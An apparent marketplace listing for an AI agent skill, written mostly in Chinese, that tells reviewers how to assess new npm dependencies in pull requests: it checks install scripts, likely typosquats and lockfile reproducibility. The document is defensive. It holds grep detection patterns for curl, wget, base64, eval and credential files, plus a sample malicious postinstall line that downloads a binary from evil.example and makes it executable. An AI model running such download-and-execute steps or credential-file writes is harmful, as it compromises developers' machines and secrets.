AgentStack
Browse Sign in
Browse Why AgentStack Sell Docs
Sign in
SKILL verified Apache-2.0 Self-run

Supply Chain Review

skill-perrylink-dsh-skill-pack-security-supply-chain-review · by PerryLink

PR/新依赖快速供应链评审:危险 install/postinstall 脚本检查、typosquat 相似名判断、可复现构建验证,每项附误报判据与通过/要求修改/阻断三档决策阈值。评审引入新依赖的 PR 或需快速给出新增依赖风险结论时用;与新增依赖无关的普通代码评审不用。

No reviews yet
0 installs
16 views
0.0% view→install

Install

$ agentstack add skill-perrylink-dsh-skill-pack-security-supply-chain-review

✓ scanned · ✓ verified, works with Claude Code, Cursor, and more.

Security review

✓ Passed

No issues found. Passed automated security review. · v0.1.0 How review works →

  • Prompt-injection patterns
  • Secret / credential exfiltration
  • Dangerous shell & filesystem operations
  • Untrusted network calls
  • Known-malicious package signatures

What it can access

  • Network access Used
  • Filesystem access No
  • Shell / process execution Used
  • Environment & secrets No
  • Dynamic code execution No

From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.

View the full security report →

Verified badge

Passed review? Show it. Paste this badge into your README, it links to the public security report.

AgentStack Verified badge Links to your public security report.
[![AgentStack Verified](https://agentstack.voostack.com/badges/verified.svg)](https://agentstack.voostack.com/security/report/skill-perrylink-dsh-skill-pack-security-supply-chain-review)

Reliability & compatibility

Security review passed
0 installs to date
no reviews yet
18d ago

Declared compatibility

Claude CodeClaude Desktop

Compatibility is declared by the source manifest. End-to-end runtime verification is coming, see below.

Preview Execution monitoring

We're building live execution health for every listing: tool-call success rate, median latency, uptime, and last-checked timestamps, measured, not self-reported. It isn't live yet, so we don't show numbers we can't stand behind.

How agent discovery & health will work →
Are you the author of Supply Chain Review? Claim this listing to set pricing, connect Stripe payouts, and keep 70% of every sale.
Sign up to claim

About

新增依赖快速评审(supply-chain-review)

目标:在 PR 评审时间内(几分钟)对新增依赖给出 通过 / 要求修改 / 阻断 三档结论;每条结论必须附命令证据与误报排除说明。

自动化预检:plugin_vet 工具

plugin_vet 已自动执行本技能第 1/2/3 节的静态部分(危险 install 脚本、网络回传、混淆载荷、commit/action 锁定),其结果逐条引用本技能小节编号。自动化命中后,按各节的误报判据与放行判据人工确认,再下三档结论。

0. 确认范围

git diff ...HEAD --stat -- package.json pnpm-lock.yaml
git diff ...HEAD --unified=0 -- package.json | grep '^+'

样例输出:

 package.json      | 4 ++++
 pnpm-lock.yaml    | 12 ++++++++++++
+    "example-lib": "^2.3.0",

判据:无 manifest 变更 → 本技能不适用,停止;只有 devDependencies 变更 → 按"不进生产产物"整体降一档风险,但脚本检查照做。 ` 用 PR 的真实 base(git merge-base HEAD` 可先确认),不要猜。

1. 危险 install 脚本检查(阻断级候选)

对每个新包执行:

npm view  scripts --json

样例输出:{ "postinstall": "node scripts/download.js" }。 危险特征清单(完整版与复核 grep 见 references/install-script-checks.md):

  • curl/wget/Invoke-WebRequest 下载可执行文件后执行;
  • base64 -d/eval/child_process.exec/os.system 配合外部输入或拼接载荷;
  • 写入 ~/.ssh.npmrc.gitconfig、credentials、全局 shell 配置。

复核命令(解包看真实内容,不只信 manifest 描述):

npm pack  --pack-destination .tmp
tar -xzf .tmp/-.tgz -C .tmp
grep -rnE '(curl|wget|base64|eval|\.ssh|npmrc)' .tmp/package/package.json .tmp/package/*.js

样例输出:.tmp/package/scripts/download.js:3:curl -sSL https://evil.example/x -o /tmp/x && chmod +x /tmp/x 误报判据:构建工具链的安装脚本是生态惯例(esbuild、sharp、node-gyp、core-js 等)——放行判据 = 脚本行为与包用途一致 且 不触碰用户凭据/全局配置;两者任一不满足 = 阻断级。 阻断条件(任一即阻断):下载并执行二进制、访问凭据文件、混淆载荷(base64/hex 拼装后 eval)、安装后写全局配置。 git 安装向量:依赖来自 git URL 时(DSH 的 git 安装会执行 prepare 脚本),npm view 看不到其脚本——先 git grep -nE 'git\+https?://' -- package.json 定位,再 git clone --depth 1 .tmp/gitdepgrep -nE '"(prepare|preinstall)"' .tmp/gitdep/package.jsonprepare 在安装时执行,与 postinstall 同级对待。 包体异常:npm view dist.fileCount dist.tarball --json。判据:fileCount 异常大(如 >1000)或 tarball 域名非 registry.npmjs.org → 记录并人工复核。

2. typosquat 检查

对每个新包名:

npm view  time.created
npm view  --json | grep -E '"downloads"|"weekly"'

样例输出:2026-08-10T02:00:00.000Z(两周前创建);downloads 字段可能不存在(说明:部分 registry 不返回该字段,缺失按"未知"处理,不据此定论)。 名称比对:与流行包逐一比对编辑距离(混淆对清单与命令见 references/typosquat-and-reproducibility.md),例如 lodahs vs lodashreact-domm vs react-dom。 判据:名称与流行包编辑距离 ≤ 2 且 创建时间短/下载量极低 两条同时成立 → 阻断;只中一条 → 要求修改并转 dependency-audit 投毒清单复查。 误报判据:领域完全无关的小众同名包,不因"下载量低"单条被误杀——必须"名称相似 + 上下文可疑"同时成立。

3. 可复现构建验证

git ls-files -- '*lock*' | head -n 5
grep -nE 'frozen-lockfile|npm ci|--frozen' .github/workflows/* 2>/dev/null
grep -c 'integrity' 
pnpm install --frozen-lockfile

样例输出:锁文件路径一行;CI 命中行 install: pnpm install --frozen-lockfile;integrity 计数 1234。 判据(三要素,见 references/typosquat-and-reproducibility.md):

  • 锁文件已提交 + CI 冻结安装 + integrity 字段齐全 = 通过;
  • 缺任一 = 要求修改;
  • 缺锁文件 新增直接依赖 > 20 个 = 阻断。
  • pnpm install --frozen-lockfile 失败样例与处理转 dependency-audit 第 5 节;平台差异不关冻结开关。
  • CI 配置复核(PR 改了 workflow 时必查):git diff ...HEAD -- .github/workflows | grep -nE '^\+.*uses:'——新增/改动的 uses: /@v 未 pin 到 commit SHA(@)→ 要求修改(tag 可被移动);只读、不触密钥的第三方 action 记录即可,不阻断。
  • 锁文件新增量复核:git diff ...HEAD -- | grep -cE '^\+' 与新增直接依赖数对照;声明 1 个依赖却 +500 行 → 记录并人工核对 diff 内容。

4. 结论与评论模板

三档定义、触发条件与 PR 评论模板见 references/typosquat-and-reproducibility.md。 结论必须包含:证据命令 + 输出摘要 + 误报排除说明("我排除了 X,因为 ")。

Source & license

This open-source skill is cataloged on AgentStack and links to its original source — we do not rehost the code.

Install and usage instructions live in the source repository linked above.

Reviews

No reviews yet, be the first.

Versions

  • v0.1.0 Imported from the upstream source.